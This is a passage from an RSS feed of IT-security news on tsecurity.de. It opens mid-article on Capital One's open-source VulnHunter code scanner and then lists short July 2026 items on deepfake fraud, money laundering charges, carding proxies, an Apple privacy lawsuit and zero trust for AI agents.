embedding a structured safety mechanism into a small number of training examples could recover a model's safety alignment without degrading performance. The attacker-first forward analysis reflects the philosophy of "<a href="https://arxiv.org/html/2406.18510v1">WildTeaming</a>," a framework that collects and analyzes real-world jailbreak attempts to build more resilient models. And VulnHunter's emphasis on minimizing false positives parallels the goals of "GuardFormer," a guardrail classifier that outperformed GPT-4 on safety benchmarks while running 14 times faster.</p><p>The thread connecting all of this work is a conviction that traditional, reactive security — monitoring networks, patching known vulnerabilities, responding to incidents after they occur — is no longer sufficient when adversaries can use AI to discover and exploit zero-day vulnerabilities at machine speed. The only durable defense, Capital One argues, is to find and fix the vulnerabilities in your own code before attackers find them first.</p><h2><b>What Capital One's cloud security journey reveals about the entire banking industry</b></h2><p>Capital One's arc from breach victim to open-source security contributor also illuminates a broader reckoning across financial services. When Capital One <a href="https://www.latimes.com/business/story/2019-07-30/capital-one-cloud-safety-hacker-breach">moved aggressively to Amazon Web Services</a> in the mid-2010s, it was a rarity among major banks. Most financial institutions simply did not trust third parties to store their most sensitive data. Capital One's CIO at the time, Rob Alexander, <a href="https://www.forbes.com/sites/peterhigh/2016/12/12/how-capital-one-became-a-leading-digital-bank/">publicly championed the cloud</a> as more secure than the bank's own data centers — a claim that the 2019 breach complicated considerably.</p><p>The <a href="https://cyberscoop.com/capital-one-hack-banking-security/">CyberScoop report</a> from that period captured the tension within the industry. W. Patrick Opet, managing director of cybersecurity at JP Morgan Chase, described a cultural shift in banking from prioritizing traders to prioritizing developers: "Now, it's 'Focus on the developer, turn everything into code, and automate everything.'" Mark Nicholson, Deloitte's cyber leader for the financial industry, noted that the pressure to move quickly was exposing "weaknesses in the development methodology." And the breach itself was a reminder that even as Chase spent $600 million annually on cybersecurity, relatively simple vulnerabilities — like the Apache Struts bug that enabled the Equifax breach — could undercut massive investments in data protection.</p><p>Seven years later, the industry has largely followed Capital One into the cloud, and the security challenges have only intensified. The question is no longer whether to use cloud infrastructure but how to secure the software that runs on it. VulnHunter represents Capital One's answer: rather than relying solely on network-level controls and perimeter defenses, push security directly into the code itself, at the moment it is written. The open-source release also carries implicit competitive pressure. If VulnHunter gains traction among developers and security teams, it could set a new baseline for what enterprise security tooling is expected to do — and force rival banks, fintechs, and cloud providers to match or exceed its capabilities.</p><p>Whether <a href="https://github.com/capitalone/vulnhunter">VulnHunter</a> lives up to that ambition will depend on adoption, community engagement, and the tool's real-world performance against the increasingly sophisticated AI-powered attacks it was designed to counter. But the release itself tells a story that extends well beyond any single tool or any single company. In 2019, a misconfigured firewall exposed 100 million records and turned Capital One into a cautionary tale about the cost of moving fast without moving carefully. In 2026, the same institution is open-sourcing the kind of AI-driven defense it wishes it had built sooner — and betting that the best way to protect its own code is to help the entire industry protect theirs.</p><p>
</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[ICE Is Using Data Broker Tools to ‘Identify Unaccompanied Minors’ and ‘Fraud’]]></title>
<description><![CDATA[A newly renewed, $25 million-per-year contract with a subsidiary of Thompson Reuters further expands the power of ICE under the Trump administration.]]></description>
<link>https://tsecurity.de/de/3676771/it-nachrichten/ice-is-using-data-broker-tools-to-identify-unaccompanied-minors-and-fraud/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676771/it-nachrichten/ice-is-using-data-broker-tools-to-identify-unaccompanied-minors-and-fraud/</guid>
<pubDate>Fri, 17 Jul 2026 20:03:00 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A newly renewed, $25 million-per-year contract with a subsidiary of Thompson Reuters further expands the power of ICE under the Trump administration.]]></content:encoded>
</item>
<item>
<title><![CDATA[Deepfake Cyber Fraud Costs Capillary Technologies Over ₹32 Crore]]></title>
<description><![CDATA[  Capillary Technologies’ recent deepfake-enabled cyber fraud incident highlights how rapidly evolving AI tools are transforming from business enablers into serious security threats for global enterprises. The Bengaluru-based SaaS company disclosed that an overseas step-down subsidiary lost aroun...]]></description>
<link>https://tsecurity.de/de/3676669/it-security-nachrichten/deepfake-cyber-fraud-costs-capillary-technologies-over-32-crore/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676669/it-security-nachrichten/deepfake-cyber-fraud-costs-capillary-technologies-over-32-crore/</guid>
<pubDate>Fri, 17 Jul 2026 19:25:11 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>  Capillary Technologies’ recent deepfake-enabled cyber fraud incident highlights how rapidly evolving AI tools are transforming from business enablers into serious security threats for global enterprises. The Bengaluru-based SaaS company disclosed that an overseas step-down subsidiary lost around €3 million,…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/deepfake-cyber-fraud-costs-capillary-technologies-over-%E2%82%B932-crore/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/deepfake-cyber-fraud-costs-capillary-technologies-over-%E2%82%B932-crore/">Deepfake Cyber Fraud Costs Capillary Technologies Over ₹32 Crore</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[State officials, election experts pan Trump speech: ‘This is what desperation looks like’]]></title>
<description><![CDATA[The president’s speech re-hashed debunked conspiracies around U.S. elections. Critics say the administration’s 18-month investigation into voter fraud has been a total failure. 
The post State officials, election experts pan Trump speech: ‘This is what desperation looks like’ appeared first on Cy...]]></description>
<link>https://tsecurity.de/de/3676604/it-security-nachrichten/state-officials-election-experts-pan-trump-speech-this-is-what-desperation-looks-like/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676604/it-security-nachrichten/state-officials-election-experts-pan-trump-speech-this-is-what-desperation-looks-like/</guid>
<pubDate>Fri, 17 Jul 2026 18:28:55 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The president’s speech re-hashed debunked conspiracies around U.S. elections. Critics say the administration’s 18-month investigation into voter fraud has been a total failure. </p>
<p>The post <a href="https://cyberscoop.com/state-officials-election-experts-pan-trump-voter-fraud-speech-call-it-desperation/">State officials, election experts pan Trump speech: ‘This is what desperation looks like’</a> appeared first on <a href="https://cyberscoop.com/">CyberScoop</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[2026 Cybersecurity Forecast: Mid-Year Review and H2 Threat Predictions]]></title>
<description><![CDATA[Mid-2026 cybersecurity review: ransomware trends, OAuth attacks, AI fraud, and H2 threat predictions shaping enterprise risk strategies.
The post 2026 Cybersecurity Forecast: Mid-Year Review and H2 Threat Predictions appeared first on Fidelis Security.]]></description>
<link>https://tsecurity.de/de/3676386/it-security-nachrichten/2026-cybersecurity-forecast-mid-year-review-and-h2-threat-predictions/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676386/it-security-nachrichten/2026-cybersecurity-forecast-mid-year-review-and-h2-threat-predictions/</guid>
<pubDate>Fri, 17 Jul 2026 17:10:04 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Mid-2026 cybersecurity review: ransomware trends, OAuth attacks, AI fraud, and H2 threat predictions shaping enterprise risk strategies.</p>
<p>The post <a href="https://fidelissecurity.com/threatgeek/threat-intelligence/2026-cybersecurity-forecast-mid-year-review/">2026 Cybersecurity Forecast: Mid-Year Review and H2 Threat Predictions</a> appeared first on <a href="https://fidelissecurity.com/">Fidelis Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Synthetischer Betrug vs. AI-Auditing: Das neue Wettrüsten im Risk Management]]></title>
<description><![CDATA[Kriminelle nutzen Deepfakes und perfekte KI-Rechnungen für CEO-Fraud. Unternehmen müssen mit forensischer KI gegensteuern, um Anomalien sofort zu stoppen.

Tags: #Cyber Crime | #Künstliche Intelligenz]]></description>
<link>https://tsecurity.de/de/3676346/it-security-nachrichten/synthetischer-betrug-vs-ai-auditing-das-neue-wettruesten-im-risk-management/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676346/it-security-nachrichten/synthetischer-betrug-vs-ai-auditing-das-neue-wettruesten-im-risk-management/</guid>
<pubDate>Fri, 17 Jul 2026 16:38:49 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1920" height="1080" src="https://www.it-daily.net/wp-content/uploads/2025/06/Ki-Betrug-1920-shutterstock-2627123483.jpg" class="attachment-full size-full wp-post-image" alt="Ki-Betrug" decoding="async" srcset="https://www.it-daily.net/wp-content/uploads/2025/06/Ki-Betrug-1920-shutterstock-2627123483.jpg 1920w, https://www.it-daily.net/wp-content/uploads/2025/06/Ki-Betrug-1920-shutterstock-2627123483-300x169.jpg 300w, https://www.it-daily.net/wp-content/uploads/2025/06/Ki-Betrug-1920-shutterstock-2627123483-1024x576.jpg 1024w, https://www.it-daily.net/wp-content/uploads/2025/06/Ki-Betrug-1920-shutterstock-2627123483-768x432.jpg 768w, https://www.it-daily.net/wp-content/uploads/2025/06/Ki-Betrug-1920-shutterstock-2627123483-1536x864.jpg 1536w" sizes="(max-width: 1920px) 100vw, 1920px" title="Synthetischer Betrug vs. AI-Auditing: Das neue Wettrüsten im Risk Management 1"></p>
    Kriminelle nutzen Deepfakes und perfekte KI-Rechnungen für CEO-Fraud. Unternehmen müssen mit forensischer KI gegensteuern, um Anomalien sofort zu stoppen.

<p>Tags: <a href="https://www.it-daily.net/thema/cyber-crime">#Cyber Crime</a> | <a href="https://www.it-daily.net/thema/kuenstliche-intelligenz">#Künstliche Intelligenz</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Inside the Search for "Clean" Residential Proxies for Carding]]></title>
<description><![CDATA[Residential proxies are no longer the silver bullet they once were for carding. Flare explains why cybercriminals increasingly seek "clean" residential proxies and combine them with browser fingerprints, device profiles, and other identity signals to evade modern fraud detection. [...]]]></description>
<link>https://tsecurity.de/de/3676316/it-security-nachrichten/inside-the-search-for-clean-residential-proxies-for-carding/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676316/it-security-nachrichten/inside-the-search-for-clean-residential-proxies-for-carding/</guid>
<pubDate>Fri, 17 Jul 2026 16:24:42 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Residential proxies are no longer the silver bullet they once were for carding. Flare explains why cybercriminals increasingly seek "clean" residential proxies and combine them with browser fingerprints, device profiles, and other identity signals to evade modern fraud detection. [...]]]></content:encoded>
</item>
<item>
<title><![CDATA[Deepfake Fraud and Executive Impersonation: Why Verification Matters More Than Recognition]]></title>
<description><![CDATA[Why Are Deepfakes Becoming a Business Problem? 
For several years, deepfakes were treated as a curiosity.]]></description>
<link>https://tsecurity.de/de/3676121/it-security-nachrichten/deepfake-fraud-and-executive-impersonation-why-verification-matters-more-than-recognition/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676121/it-security-nachrichten/deepfake-fraud-and-executive-impersonation-why-verification-matters-more-than-recognition/</guid>
<pubDate>Fri, 17 Jul 2026 15:05:52 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="hs-featured-image-wrapper"> 
 <a href="https://cybermaniacs.com/cm-blog/deepfake-fraud-and-executive-impersonation-why-verification-matters-more-than-recognition" title="" class="hs-featured-image-link"> <img src="https://cybermaniacs.com/hubfs/Blog%20Header%20Graphics/What-are-human-risks-in-cyber-security-management.jpg" alt="Deepfake Fraud and Executive Impersonation: Why Verification Matters More Than Recognition" class="hs-featured-image"> </a> 
</div> 
<h2><strong><span>Why Are Deepfakes Becoming a Business Problem?</span></strong></h2> 
<p><span>For several years, deepfakes were treated as a curiosity.</span></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Why the first GPU financiers are turning to inference chips in a $400 million deal]]></title>
<description><![CDATA[A $400 million chip-backed loan points to the next wave of AI infrastructure deals.]]></description>
<link>https://tsecurity.de/de/3675961/it-nachrichten/why-the-first-gpu-financiers-are-turning-to-inference-chips-in-a-400-million-deal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675961/it-nachrichten/why-the-first-gpu-financiers-are-turning-to-inference-chips-in-a-400-million-deal/</guid>
<pubDate>Fri, 17 Jul 2026 14:03:28 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A $400 million chip-backed loan points to the next wave of AI infrastructure deals.]]></content:encoded>
</item>
<item>
<title><![CDATA[NatWest signs up to quantum trial for fraud detection]]></title>
<description><![CDATA[The retail bank is one of 11 organisations testing quantum technologies as part of Digital Catapult’s quantum technology access programme]]></description>
<link>https://tsecurity.de/de/3675878/it-nachrichten/natwest-signs-up-to-quantum-trial-for-fraud-detection/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675878/it-nachrichten/natwest-signs-up-to-quantum-trial-for-fraud-detection/</guid>
<pubDate>Fri, 17 Jul 2026 13:18:18 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The retail bank is one of 11 organisations testing quantum technologies as part of Digital Catapult’s quantum technology access programme]]></content:encoded>
</item>
<item>
<title><![CDATA[US Charges Two Over $43M Chinese Money Laundering Operation]]></title>
<description><![CDATA[U.S. authorities have charged two New York residents, including Zhuoying Chen, in connection with an alleged Chinese money laundering network accused of laundering at least $43 million generated through cyber investment fraud schemes. The indictment, unsealed in Brooklyn, alleges the operation ra...]]></description>
<link>https://tsecurity.de/de/3675847/it-security-nachrichten/us-charges-two-over-43m-chinese-money-laundering-operation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675847/it-security-nachrichten/us-charges-two-over-43m-chinese-money-laundering-operation/</guid>
<pubDate>Fri, 17 Jul 2026 13:10:00 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1236" height="721" src="https://thecyberexpress.com/wp-content/uploads/Chinese-money-laundering.webp" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Chinese money laundering" decoding="async" srcset="https://thecyberexpress.com/wp-content/uploads/Chinese-money-laundering.webp 1236w, https://thecyberexpress.com/wp-content/uploads/Chinese-money-laundering-300x175.webp 300w, https://thecyberexpress.com/wp-content/uploads/Chinese-money-laundering-1024x597.webp 1024w, https://thecyberexpress.com/wp-content/uploads/Chinese-money-laundering-768x448.webp 768w, https://thecyberexpress.com/wp-content/uploads/Chinese-money-laundering-600x350.webp 600w, https://thecyberexpress.com/wp-content/uploads/Chinese-money-laundering-150x88.webp 150w, https://thecyberexpress.com/wp-content/uploads/Chinese-money-laundering-750x438.webp 750w, https://thecyberexpress.com/wp-content/uploads/Chinese-money-laundering-1140x665.webp 1140w, https://thecyberexpress.com/wp-content/uploads/Chinese-money-laundering.webp 1236w, https://thecyberexpress.com/wp-content/uploads/Chinese-money-laundering-300x175.webp 300w, https://thecyberexpress.com/wp-content/uploads/Chinese-money-laundering-1024x597.webp 1024w, https://thecyberexpress.com/wp-content/uploads/Chinese-money-laundering-768x448.webp 768w, https://thecyberexpress.com/wp-content/uploads/Chinese-money-laundering-600x350.webp 600w, https://thecyberexpress.com/wp-content/uploads/Chinese-money-laundering-150x88.webp 150w, https://thecyberexpress.com/wp-content/uploads/Chinese-money-laundering-750x438.webp 750w, https://thecyberexpress.com/wp-content/uploads/Chinese-money-laundering-1140x665.webp 1140w" sizes="(max-width: 1236px) 100vw, 1236px" title="US Charges Two Over $43M Chinese Money Laundering Operation 1"></p><span data-contrast="auto">U.S. authorities have charged two New York residents, including Zhuoying Chen, in connection with an alleged Chinese money laundering network accused of laundering at least $43 million generated through cyber investment fraud schemes. The indictment, unsealed in Brooklyn, alleges the operation ran between 2020 and 2022 and involved an extensive network of shell companies and bank accounts.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">According to <a href="https://www.justice.gov/opa/pr/two-key-members-chinese-money-laundering-network-charged-laundering-43-million-investment" target="_blank" rel="nofollow noopener">prosecutors</a>, Zhuoying Chen, 27, of Brooklyn, and Haojie Zhang, 38, of Queens, managed more than a dozen individuals across Brooklyn and Queens. The group allegedly opened 140 bank accounts under approximately 45 shell companies to move proceeds from fraudulent investment scams before transferring the funds to co-conspirators based in China.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">Authorities said the <a href="https://thecyberexpress.com/global-crypto-investment-scam/" target="_blank" rel="noopener">investment fraud</a> schemes began with perpetrators contacting victims through messaging platforms and social media. They allegedly built trust over time, persuaded victims to invest in seemingly lucrative opportunities, displayed fake profits to encourage additional investments, and ultimately stole the victims' money.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>
<h3 aria-level="2"><b><span data-contrast="none">Officials Vow Crackdown on Chinese Money Laundering Operations</span></b><span data-ccp-props='{"134233117":false,"134233118":false,"134245418":true,"134245529":true,"335551550":0,"335551620":0,"335559738":299,"335559739":299}'> </span></h3>
<span data-contrast="auto">Commenting on the Chinese money laundering case, Assistant Attorney <a class="wpil_keyword_link" href="https://cyble.com/general/" target="_blank" rel="noopener" title="General" data-wpil-keyword-link="linked" data-wpil-monitor-id="29016">General</a> A. Tysen Duva said, "As alleged in the indictment, the defendants laundered <a class="wpil_keyword_link" href="https://cyble.com/cybercrime/fraud/" target="_blank" rel="noopener" title="fraud" data-wpil-keyword-link="linked" data-wpil-monitor-id="29015">fraud</a> proceeds, enabling scammers to continue to victimize Americans and deprive them of their hard-earned money." He added that dismantling Chinese money laundering networks supporting investment fraud is critical to protecting Americans and that the Criminal Division "will relentlessly pursue the financial networks that fuel and profit from these fraud schemes."</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">U.S. Attorney Joseph Nocella Jr. for the Eastern District of New York described the defendants as "key members of a sophisticated money laundering network" that allegedly routed more than $40 million in victim funds to bank accounts in China. He said the office would continue pursuing individuals involved in investment fraud targeting vulnerable victims.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">FBI New York Assistant Director in Charge James C. Barnacle Jr. stated that the operation allegedly laundered more than $40 million from American victims before depositing the funds into Chinese accounts overseas. He said the <a href="https://thecyberexpress.com/operation-tri-force-sentinel/" target="_blank" rel="noopener">FBI</a> remains committed to working with federal partners to dismantle such fraud networks.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">Acting Executive Associate Director John A. Condon of Homeland <a class="wpil_keyword_link" href="https://thecyberexpress.com/" title="Security" data-wpil-keyword-link="linked" data-wpil-monitor-id="29014">Security</a> Investigations said the two Chinese nationals allegedly operated the illicit network for nearly two years, laundering victims' life savings. IRS Criminal Investigation Special Agent in Charge Harry T. Chavis Jr. said the indictment demonstrates that "justice is coming" for fraudsters, while U.S. Postal Inspection Service Inspector in Charge Ketty Larco-Ward noted that investment fraud schemes <a class="wpil_keyword_link" href="https://cyble.com/exploit/" target="_blank" rel="noopener" title="exploit" data-wpil-keyword-link="linked" data-wpil-monitor-id="29013">exploit</a> victims' trust through false promises of returns.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>
<h3 aria-level="2"><b><span data-contrast="none">Investigation and Legal Proceedings Continue</span></b><span data-ccp-props='{"134233117":false,"134233118":false,"134245418":true,"134245529":true,"335551550":0,"335551620":0,"335559738":299,"335559739":299}'> </span></h3>
<span data-contrast="auto">The conspiracy to commit money laundering charge carries a maximum sentence of 20 years in prison. The investigation is being conducted by FBI New York, HSI New York, IRS Criminal Investigation New York, and the U.S. Postal Inspection Service. The prosecution is being led by Trial Attorneys Claire Galasso, David Ginensky, and Adrienne Rosen, along with Assistant U.S. Attorneys Benjamin Weintraub and David Berman.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">The case also forms part of the Homeland Security Task Force initiative established under Executive Order 14159. Officials emphasized that an indictment is only an allegation, and Zhuoying Chen and the co-defendant are presumed innocent unless proven guilty beyond a reasonable doubt in court.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>]]></content:encoded>
</item>
<item>
<title><![CDATA[A unified front against fraud: Securing the UK's payments future]]></title>
<description><![CDATA[As sophisticated scams escalate, can a unified front finally secure the UK’s payments?]]></description>
<link>https://tsecurity.de/de/3675743/it-nachrichten/a-unified-front-against-fraud-securing-the-uks-payments-future/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675743/it-nachrichten/a-unified-front-against-fraud-securing-the-uks-payments-future/</guid>
<pubDate>Fri, 17 Jul 2026 12:33:27 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[As sophisticated scams escalate, can a unified front finally secure the UK’s payments?]]></content:encoded>
</item>
<item>
<title><![CDATA[Warum 5.811 Festnahmen den Anlagebetrug nicht stoppen werden - All About Security]]></title>
<description><![CDATA[Hinter solchen Angeboten steckt organisierter Cybertrading Fraud. Wer einzahlt, sieht sein Geld in aller Regel nicht wieder. Besonders beunruhigt mich ...]]></description>
<link>https://tsecurity.de/de/3675519/it-security-nachrichten/warum-5811-festnahmen-den-anlagebetrug-nicht-stoppen-werden-all-about-security/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675519/it-security-nachrichten/warum-5811-festnahmen-den-anlagebetrug-nicht-stoppen-werden-all-about-security/</guid>
<pubDate>Fri, 17 Jul 2026 10:54:41 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Hinter solchen Angeboten steckt organisierter Cybertrading Fraud. Wer einzahlt, sieht sein Geld in aller Regel nicht wieder. Besonders beunruhigt mich ...]]></content:encoded>
</item>
<item>
<title><![CDATA[US charges two over laundering $43 million from investment fraud]]></title>
<description><![CDATA[U.S. prosecutors on Thursday charged a New York man and woman for their roles in a large-scale crime ring that laundered money stolen in cyber investment fraud scams. [...]]]></description>
<link>https://tsecurity.de/de/3675440/it-security-nachrichten/us-charges-two-over-laundering-43-million-from-investment-fraud/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675440/it-security-nachrichten/us-charges-two-over-laundering-43-million-from-investment-fraud/</guid>
<pubDate>Fri, 17 Jul 2026 10:23:15 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[U.S. prosecutors on Thursday charged a New York man and woman for their roles in a large-scale crime ring that laundered money stolen in cyber investment fraud scams. [...]]]></content:encoded>
</item>
<item>
<title><![CDATA[New infosec products of the week: July 17, 2026]]></title>
<description><![CDATA[Here’s a look at the most interesting products from the past week, featuring releases from Cloudflare, Lineation.ai, Nudge Security, and Polygraf AI. Polygraf AI Meeting Guard delivers real-time deepfake detection for enterprise meetings Polygraf AI has announced Meeting Guard, a real-time AI fra...]]></description>
<link>https://tsecurity.de/de/3675018/it-security-nachrichten/new-infosec-products-of-the-week-july-17-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675018/it-security-nachrichten/new-infosec-products-of-the-week-july-17-2026/</guid>
<pubDate>Fri, 17 Jul 2026 06:08:29 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Here’s a look at the most interesting products from the past week, featuring releases from Cloudflare, Lineation.ai, Nudge Security, and Polygraf AI. Polygraf AI Meeting Guard delivers real-time deepfake detection for enterprise meetings Polygraf AI has announced Meeting Guard, a real-time AI fraud detection solution for enterprise meetings built to detect fraud and protect meeting security. It joins virtual meetings as a visible participant and delivers near-real-time security analysis to every attendee. Built for enterprise … <a href="https://www.helpnetsecurity.com/2026/07/17/new-infosec-products-of-the-week-july-17-2026/" rel="nofollow">More <span class="meta-nav">→</span></a></p>
<p>The post <a href="https://www.helpnetsecurity.com/2026/07/17/new-infosec-products-of-the-week-july-17-2026/">New infosec products of the week: July 17, 2026</a> appeared first on <a href="https://www.helpnetsecurity.com/">Help Net Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Multiple Investigations Refuted Trump’s Claims That Fraud Altered the Outcome in 2020]]></title>
<description><![CDATA[Dozens of investigations, audits, recounts and court proceedings examined the 2020 election. None found the widespread voter fraud that President Trump claimed tilted the vote.]]></description>
<link>https://tsecurity.de/de/3674889/it-security-nachrichten/multiple-investigations-refuted-trumps-claims-that-fraud-altered-the-outcome-in-2020/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3674889/it-security-nachrichten/multiple-investigations-refuted-trumps-claims-that-fraud-altered-the-outcome-in-2020/</guid>
<pubDate>Fri, 17 Jul 2026 03:36:25 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Dozens of investigations, audits, recounts and court proceedings examined the 2020 election. None found the widespread voter fraud that President Trump claimed tilted the vote.]]></content:encoded>
</item>
<item>
<title><![CDATA[Hide My Email class action lawsuit seeks payout without evidence of any attacks]]></title>
<description><![CDATA[A proposed class action is trying to turn Apple's unresolved Hide My Email flaw into a nationwide payout without alleging that the vulnerability was used in an attack or that the plaintiff's email address was exposed.Apple's Hide My Email serviceAnthony Alvarez filed the lawsuit against Apple on ...]]></description>
<link>https://tsecurity.de/de/3674409/ios-mac-os/hide-my-email-class-action-lawsuit-seeks-payout-without-evidence-of-any-attacks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3674409/ios-mac-os/hide-my-email-class-action-lawsuit-seeks-payout-without-evidence-of-any-attacks/</guid>
<pubDate>Thu, 16 Jul 2026 20:39:27 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A proposed class action is trying to turn Apple's unresolved Hide My Email flaw into a nationwide payout without alleging that the vulnerability was used in an attack or that the plaintiff's email address was exposed.<br><br><div><img src="https://photos5.appleinsider.com/gallery/68269-143900-967A61C1-FA5C-4CF0-9182-D26130A192AD-xl.jpg" alt="iPhone screen on Hide my email setup page, showing a generated iCloud email address, a text field labeled Test being edited, and part of the keyboard, resting on brown leather surface" height="738"><span>Apple's Hide My Email service</span></div><br>Anthony Alvarez filed the lawsuit against Apple on July 15 in the U.S. District Court for the Northern District of California. The complaint accuses the company of false advertising, fraud, breach of contract, and other violations tied to its marketing of Hide My Email.<br><br>The filing argues that Apple sold customers privacy it couldn't provide. The claims cover the full version included with paid <a href="https://appleinsider.com/inside/icloud" title="iCloud" data-kpt="1">iCloud</a>+ plans and the more limited relay addresses generated through Sign in with Apple.<br><br>Alvarez seeks to represent four proposed classes covering U.S. Apple customers, including two California subclasses. The lawsuit seeks damages and an order requiring Apple to fix Hide My Email or clearly disclose its limitations.<br><br><br> <a href="https://appleinsider.com/articles/26/07/16/hide-my-email-class-action-lawsuit-seeks-payout-without-evidence-of-any-attacks?utm_source=rss">Continue Reading on AppleInsider</a> | <a href="https://forums.appleinsider.com/discussion/244975?urm_source=rss">Discuss on our Forums</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Zero trust must now move at agent speed]]></title>
<description><![CDATA[Presented by Ping Identity Enterprises need to treat zero trust security architecture as an immediate requirement for AI agents rather than a long-term goal, says Andre Durand, CEO and founder of Ping Identity. Zero trust, the security model built on the assumption that no user, device, or system...]]></description>
<link>https://tsecurity.de/de/3674339/it-nachrichten/zero-trust-must-now-move-at-agent-speed/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3674339/it-nachrichten/zero-trust-must-now-move-at-agent-speed/</guid>
<pubDate>Thu, 16 Jul 2026 20:02:42 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><i>Presented by Ping Identity </i></p><hr><p>Enterprises need to treat zero trust security architecture as an immediate requirement for AI agents rather than a long-term goal, says Andre Durand, CEO and founder of Ping Identity. Zero trust, the security model built on the assumption that no user, device, or system should be automatically trusted, requires continuous verification before every action rather than a single check at login. Agentic AI has profoundly compressed the risk timeline enterprises must manage, demanding that permission decisions be evaluated in real time.</p><p><span>type: <!-- -->embedded-entry-inline<!-- --> id: <!-- -->1Ieiy1KhHNWZE5KVqNdA1G</span></p><p>That compression shows up in how permissions accumulate. Every time an employee approves an AI agent's request for access to a company drive, a database, or a code repository, the enterprise hands over a sliver of control that looks routine in isolation. Across thousands of agents making thousands of requests, those approvals accumulate into an exposure that most existing security architectures were never built to measure.</p><p>"The rise in desire to use agents right now, and the speed of agentic, is highlighting the need to move faster on the principles of zero trust," Durand says. "Agents just move faster, full stop. A human compromise might be measured in minutes or hours, sometimes days. At agentic speed, a thousand actions could happen in five minutes."</p><h2>Why zero trust is now urgent for agentic AI</h2><p>That difference in velocity changes how enterprises need to think about permissions. Two variables matter: the surface area of access an agent is granted and the duration that access remains valid. Traditional identity and access management tends to grant broad permissions and leave sessions open for extended periods because the human using them moves at human speed. Zero trust, in contrast, collapses both variables at once by narrowing access down to what is strictly necessary and revalidating it continuously, 